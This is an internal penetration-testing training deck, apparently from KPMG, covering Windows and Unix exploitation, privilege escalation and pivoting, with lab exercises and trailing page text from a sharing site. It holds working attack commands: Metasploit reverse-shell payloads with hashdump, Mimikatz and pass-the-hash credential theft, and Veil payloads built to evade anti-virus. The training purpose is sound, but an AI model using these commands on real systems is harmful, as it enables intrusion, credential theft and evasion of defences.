• Exploiting actual software flaws in the Operating System or additional software
installed (many Windows Backup software remote listeners became targets) -
Metasploit is your friend- ensure your copy is working and up-to-date. Spend time learning
how to use it – it is an invaluable framework for infrastructure penetration testing
• Metasploit is an advanced tool that could have a training course to itself, but for further
reading, an excellent resource:
http://www.offensive-security.com/metasploit-unleashed/Introduction
• Remote shares are often open to abuse:
• >net view \\<host>
• >net use \\<host>\<sharename> (or just connect to \\<host> in an explorer window)
• Misconfiguration of services – e.g. anonymous FTP, default passwords
*nix Remote Exploitation
INTERNAL USE ONLY
• Again: Metasploit is your friend

• Raptor exploits - http://www.0xdeadbeef.info/
• Exploit database – http://www.exploit-db.com
• Misconfigurations of common *nix services:
• SSH, SNMP, Finger, RPC Services (many exploits in Metasploit for older versions of
Solaris), TFTP.
• X Windows and X sessions abuse.
• Open NFS / SMB shares.
• Brute-force attacks against authenticated services (after enumeration of users via
services such as SNMP, finger, NFS etc.).
• Application-layer vulnerabilities.
Application Layer Remote Exploitation
INTERNAL USE ONLY
• It is also possible to exploit additional applications that are installed on the system.
• Common quick wins with a high degree of confidence and low risk are:
• JBOSS and Tomcat manager (without credentials or with default username / password)
• Anything PHP can be a good bet
• Look out for Heartbleed and Shellshock too
• Investigate other web servers running on target systems to determine whether they
have default credentials, poorly configured scripts or leak useful information that might
be used to gain access to other elements of the service.
Using Metasploit (carefully!)
INTERNAL USE ONLY
./msfupdate (or similar depending on how you use Metasploit)
> search <term*>
> use <exploit>
> show options
> info <module name> give info on the exploit, including rating on performance of exploit
> set PAYLOAD <payload>
• Good PAYLOAD for windows is: windows/meterpreter/reverse_tcp
> check (for some exploits, you can check if host is vulnerable)
> exploit
If exploit works:
>getsystem
>hashdump
>search <term> is useful to search for exploits relating to different services or products
Windows Local Privilege Escalation
INTERNAL USE ONLY
• Often on infrastructure tests, you get access to a standard Workstation/Laptop/Citrix

user session and told to perform testing from there.
• Sometimes you have USB access or limited Internet connectivity for tool downloads,
although sometimes you will not be able to update the platform at all.
• The typical scenario is to be given a low-privileged user account, therefore in order to
be able to do anything useful we need to try and escalate our privileges.
INTERNAL USE ONLY
• Common strategies here include:

• Searching local file systems (and any connected network shares) for files containing words
like “password” e.g. *.pass* - this also applies to Intranet searches
• Exploiting known local OS or application vulnerabilities – Metasploit or import of specific
exploit executable – Adobe/MS client vulnerabilities?
• Booting into a bootable Linux distribution (USB or CD/DVD) and modifying/extracting local
SAM file to add user or crack password hashes – this depends on a number of things such
as BIOS settings, any hard disk encryption and any software restrictions/lockdowns on
removable media.
• Examination of running services and files, their privileges and possible abuse of this is
often overlooked
INTERNAL USE ONLY
• More…
• Kon-boot
• Metasploit Browser autopwn
• Unquoted Service Paths
• E.g. Service that runs as SYSTEM and is defined using an unquoted path of:
• C:\SomeApp\Program Folder\bin\servicebinary.exe
• If your user can create a file Program.exe in C:\SomeApp\ this will be used and Folder\
bin\servicebinary.exe will be interpreted as arguments to the binary
• Create binary, place in location and reboot the box
• SYSTEM access
• Metasploit also has lots of post modules that collect data or attempt escalation
Post local privilege escalation – what next?
INTERNAL USE ONLY
• Unless ‘everything’ is in scope, inform client of a compromise and request permission

for further access into the network.
• The next step from local administrator is to escalate to Domain Administrator (or
Enterprise Admin)
• Essentially ‘pivot’ from your new high privileged location:
• run ‘netstsat –an’ to see are there any foreign connections to other network ranges?
• Upload tools to the compromised host – Nmap etc.
• Enumerate other domains and networks.
• Dump password hashes and crack passwords (Cain & Abel, John the Ripper) or use
hashes to steal sessions.
• Search for files containing *pass* etc. across all local disks and network folders (now that
you have local administrator access)
• Ideally - create a new local administrator account (KPMG or similar) and perform all further
testing from there. At the end of testing you can then delete the entire account and
associated files to remove risk to the client.
Mimikatz
INTERNAL USE ONLY
Wouldn't it be great if we could just read the plaintext password instead of cracking the
hash?
• Windows caches user passwords in the memory in order to handle WDIGEST
authentication
• Mimikatz can extract these passwords
• Available as standalone EXE (will get detected by AV)
• Meterpreter has it built in these days
• > use mimikatz
• > wdigest
Aside: Effective Password Cracking
INTERNAL USE ONLY
• Rainbow tables are the best option for fast password cracking - ophcrack is a great
tool with good free tables. The downside is that rainbow tables take up disk space, so
it’s worth working out how you’re going to do your cracking in advance, make sure you
consider protective marking restrictions also.
• John the Ripper (JTR) – supports many hash types, and it is possible to automate
cracking with the MSF. In cases where the hashes are not salted, such as some MD5 or
SHA256 deployments, you can use Google as a cracking engine, as lots of indexed
sites have collision data on them.
• Ensure that you know what the password policy is on a host!
• It is a waste of time brute-forcing with inaccurate dictionary word-lengths, you should
customise your dictionary or JTR rules to crack against the relevant password policy.
More information can be found here: http://www.openwall.com/john/doc/RULES.shtml
• Lab or cloud cracking may also be an option. Think!
• KPMG’s Dutch team have a big password cracking capability, maybe we can become
friends 
Aside: Pass-the-Hash/Windows Credential Editor (WCE)
INTERNAL USE ONLY
• Windows Credentials Editor (WCE) allows listing of logon sessions and adding,
changing, and deleting associated credentials (ex.: LM/NT hashes).
• This can be used for example, to perform pass-the-hash on Windows and also obtain
NT/LM hashes from memory (from interactive logons, services, remote desktop
connections, etc.) which can be used in further attacks.
• WCE v1.2 supports obtaining logon sessions and NTLM credentials just by reading
memory without performing code injection.
• Windows Credentials Editor supports Windows XP, 2003, Vista, 7 and 2008.
• Note: This tool requires administrator privileges and currently doesn’t run on 64-bit 
• Pass the hash functionality is available in Metasploit using Incognito 
INTERNAL USE ONLY
• Gain a remote interactive shell on ECHO (10.0.2.7) using Metasploit

• Bonus: Get the password hashes from the host
• Extra Bonus: Decrypt the ‘administrator’ password
Anti-virus
INTERNAL USE ONLY
Only trouble with Metasploit is most Anti-virus detects and blocks many of its payloads
• Even its default evasion techniques are detected!
• If you see something like this:
[*] Fingerprint: Windows 2003 - Service Pack 1 - lang:Unknown
[*] We could not detect the language pack, defaulting to English
[*] Selected Target: Windows 2003 SP1 English (NX)
[*] Attempting to trigger the vulnerability…
• And your payload never opens a session. Good chance AV is at play.
Evading Anti-virus
INTERNAL USE ONLY
Depending on the exploit you have, options are available.

• The Veil Framework is an open source framework for developing binary payloads that
will evade anti-virus
• It works VERY well
• Comprises a number of tools, notably Evasion and Catapult
Veil Evasion
INTERNAL USE ONLY
• Evasion is the core tool which produces obfuscated binary payloads

• It can generate Metasploit payloads or its own
• Multiple formats including Windows PE, Ruby and Python
• Interactive menu-based or command line options available
Veil Evasion Command Line
INTERNAL USE ONLY
Common command line options.

# veil-evasion
-p Select or list payloads
-c Payload options
-o Output base
An example command line:

• veil-evasion –p c/meterpreter/rev_http –c LHOST 192.168.1.10 –o /tmp/VEIL
Veil Catapult
INTERNAL USE ONLY
• Payload delivery tool that integrates with Veil Evasion

• Uses SMB to deliver payload to Windows target and trigger execution
• Uses the same technique as PSExec
• Needs admin credentials on the target
• Can generate payload at runtime or use an existing binary
Veil Catapult Command Line
INTERNAL USE ONLY
Common command line options.

# veil-catapult
-t Target hostname or IP address
--exe Target executable to upload and run
--winexe Use the Windows Service EXE method
--wmis Use WMIS for triggering
-U Username
-P Password
-cF Credential file in HashDump format (Pass the Hash)
--act Action to perform. Upexec is most common.
Other options can be used which are passed to veil-evasion for payload generation.
An example command line:
• veil-catapult –t somehost –exe /tmp/VEIL.exe –winexe –U administrator –P password –act upexec
INTERNAL USE ONLY
• Gain a remote interactive SYSTEM shell on BETA (10.0.2.3)
*nix Local Privilege Escalation
INTERNAL USE ONLY
In *nix – think of EVERYTHING as a file. All *nix privilege escalations therefore relate to
examination and manipulation of file permissions. Common escalation techniques
include:
■ Cron - allows tasks to be automatically run in the background at regular intervals by the cron
daemon – recorded in crontab.
■ suid/guid/ and world-writeable files and services/scripts / permission manipulation
■ .bash_history – if accessible, often leak information
■ search for files containing *pass*, *.bak etc.
■ Searching in /tmp directory often reveals interesting content
■ Local exploits – exploit-db
■ sudo - allows users to run programs with the security privileges of another user. If root then
win! Check sudoers file if accessible or just try sudo bash
■ Always be aware of ‘<element>.allow’ and ‘<element>.deny’ files, these can assist or prohibit
escalation.
Crontab
INTERNAL USE ONLY
The command to be executed may be a script/program that we can control, if in the

system or root crontab, it will run as root!
File permission abuse
INTERNAL USE ONLY
SUID = Set User ID

GUID = Set Group ID
When a SUID file is executed, the process which runs it, is granted access to system
resources based on the user who owns the file and not the user who created the process
To find all world-writeable files: find / -perm -2 ! -type l –ls

To find all SGID files: find / -xdev -type f -perm +g=s -print
To find all SUID files find / -xdev -type f -perm +u=s –print
http://catcode.com/teachmod/ is great tutorial with interactive examples (in JavaScript).

You can download this as a tar.gz file.
sudo
INTERNAL USE ONLY
The configuration file can be located at: /etc/sudoers

sudo –l will list privileges of current user.
Examples of configuration within the Sudoers file:
root ALL=(ALL) ALL
The above line means that the user ‘root’ can execute from ALL terminals, acting as ALL
(any) users, and run ALL (any) commands.
operator ALL= /sbin/poweroff
The command listed above, allows the user ‘operator’ to run the command ‘poweroff’ from
any terminal.
*nix local package checking and automating escalation vectors
INTERNAL USE ONLY
redhat rpm -qa
Debian dpkg -l
Solaris showrev –p shows patches applied to the host
pkginfo shows sun packages are installed on the host
If your permissions allow upload, a host audit script can be executed to speed up the process of
finding potential security issues.
Unix-privesc-checker:
Unix-privesc-checker is a script that runs on Unix systems (tested on Solaris 9, HPUX 11, Various
Linuxes, FreeBSD 6.2). It tries to find misconfigurations that could allow local unprivileged users
to escalate privileges to other users or to access local apps (e.g. databases). More information
and download can be found here: http://code.google.com/p/unix-privesc-check/
Unix shells
INTERNAL USE ONLY
Top tip when gaining a shell on a Unix/Linux host.

• Won't have a PTY.
• Some commands won't run
• Can't easily redirect output to a file
• This simple Python one liner can save the day. Python is nearly always installed.
• python –c 'import pty;pty.spawn("/bin/bash")'
SSH
INTERNAL USE ONLY
• SSH is an awesome tool.
• TCP Port forward and Dynamic SOCKS proxying alone are worth using it for
• Fantastic for pivoting through Unix/Linux hosts
• Most important command lines to remember:
• ssh –L <local port number>:<remote IP address>:<remote port number> host
• ssh –R <remote port number>:<local IP address>:<local port number> host
• ssh –D <local port number> host
Examples:
■ ssh –L 80:192.168.1.1:80 192.168.1.5
We can now connect to localhost:80 which will in turn connect us to 192.168.1.1 on tcp/80 via the host
192.168.1.5.
Exercise 8: Exploiting NFS and SSH configurations
INTERNAL USE ONLY
• Step 1: Enumerate open ports on epsilon (10.0.2.12)
• During this example we will be using:

• rpcinfo command
• showmount command
• mount command
• ls to enumerate file permissions
• Add users LOCALLY on your system to manipulate/create user names and match
REMOTE UIDs and get around REMOTE file and directory permissions.
• Get root
Reflection. Key Learning Points
INTERNAL USE ONLY
• Identify live hosts

• Gain an understanding of the network routing (map)
• Enumerate open ports/running services
• Enumerate usernames and password policies
• Enumerate misconfigurations – open network shares, poorly configured services
• Enumerate versions of services, and vulnerabilities in those versions
Repeat
• Identify available, reliable exploits
• Brute-force user accounts and execute reliable exploits
• Gain interactive shells/command execution
• Elevate privilege – pivot if necessary
• Job done.
Useful Guides/Lists/Tools
INTERNAL USE ONLY
http://www.vulnerabilityassessment.co.uk/Penetration%20Test.html
http://www.mindcert.com/resources/
© 2014 KPMG LLP, a UK limited liability partnership, a
subsidiary of KPMG Europe LLP and a member firm
of the KPMG network of independent member firms
affiliated with KPMG International Cooperative
('KPMG International'), a Swiss entity. All rights
reserved.
The KPMG name, logo and ‘cutting through

complexity’ are registered trademarks or trademarks
of KPMG International Cooperative (KPMG
International).

Infrastructure Testing Training v1.0

Uploaded by

Document Information

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

Infrastructure Testing Training v1.0

Uploaded by

Copyright:

Available Formats

Infrastructure

Background & Preparation

Network Layer - Mapping & Enumeration

Service & Vulnerability Enumeration

Windows – Remote Exploitation

Windows – Local Privilege Escalation

*nix – Remote Exploitation

*nix – Local Privilege Escalation

Summary & Capture the Flag (CTF)

"An exploitative test of whether the target system's security

"An exploitative test of whether the target system's security

1. The right attitude

• Record the IP address on your testing laptop – every time it changes!

• Understand the IP network

• Passive Wireshark capture – Any interesting broadcasts, identification of routing

• DNS servers transfer zone information between masters and slaves

• Simple Network Management Protocol (SNMP) very common on networking devices

Pinging lonadc1.client.int [192.168.0.130] with 32 bytes of data:

Reply from 192.168.0.130: bytes=32 time<1ms TTL=64

Ping statistics for 192.168.0.130:

Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),

Approximate round trip times in milli-seconds:

Minimum = 0ms, Maximum = 0ms, Average = 0ms

• For Windows networks, it is useful to enumerate domain names and domain

Window Command Action

• IP headers contain a Time To Live (TTL) field

Mapping a network DEST

• Traceroute - *nix and Windows implementations are different:

• Almost certainly will be blocked. Almost a finding in itself if it works!

• Host discovery on a local Ethernet network is 100% accurate – why?

Host A – 192.168.0.3 Host B – 192.168.0.4

TCP 4. Transport 4. Transport TCP

ARP 2. Data 2. Data ARP

CABLE 1. Physical 1. Physical CABLE

• Therefore, ARP scans should be used on local subnets

Firewall ACL rules restricting ICMP but permitting 80/TCP to server

Ping sweeps: Nmap –sP <target(s)>

• Assign yourself an IP address on the network

Nmap Port Scanning Cheat Sheet

# nmap -PE -sS -p 80,443 -vv -oA portscan.192.168.1.1 192.168.1.1

5) TCP SYN Packet (DST PORT = 443)

6) TCP RST Packet (SRC Port = 443)

UDP is a connectionless protocol, so it is not as straightforward to identify

Nmap scan report for 192.168.204.3

Nmap scan report for 192.168.204.7

• $ for port in $(seq 1 65535);

• Will give you output like this:

• *nix-specific username enumeration:

• Example of using enum4linux to enumerate users, groups, shares et al using a null

• Perform a port scan of BETA (10.0.2.3) and GAMMA (10.0.2.40)

• Arguably the most common cause of unintended consequences on target infrastructure.

• Do not rely on a vulnerability scanning tool.

• Enumerate all vulnerabilities on BETA (10.0.2.3) and ECHO (10.0.2.7)

• Automated password guessing is the process of trying different combinations of

NOTE: before beginning this type of attack:

• Be aware of password policies, or at least take care when brute-forcing accounts on

• It is possible to show all of the brute force modules in medusa with: -

• It is possible to show all of the brute force modules in hydra with: -

• Again: Metasploit is your friend

• Often on infrastructure tests, you get access to a standard Workstation/Laptop/Citrix

• Common strategies here include:

• Unless ‘everything’ is in scope, inform client of a compromise and request permission

• Gain a remote interactive shell on ECHO (10.0.2.7) using Metasploit

[*] We could not detect the language pack, defaulting to English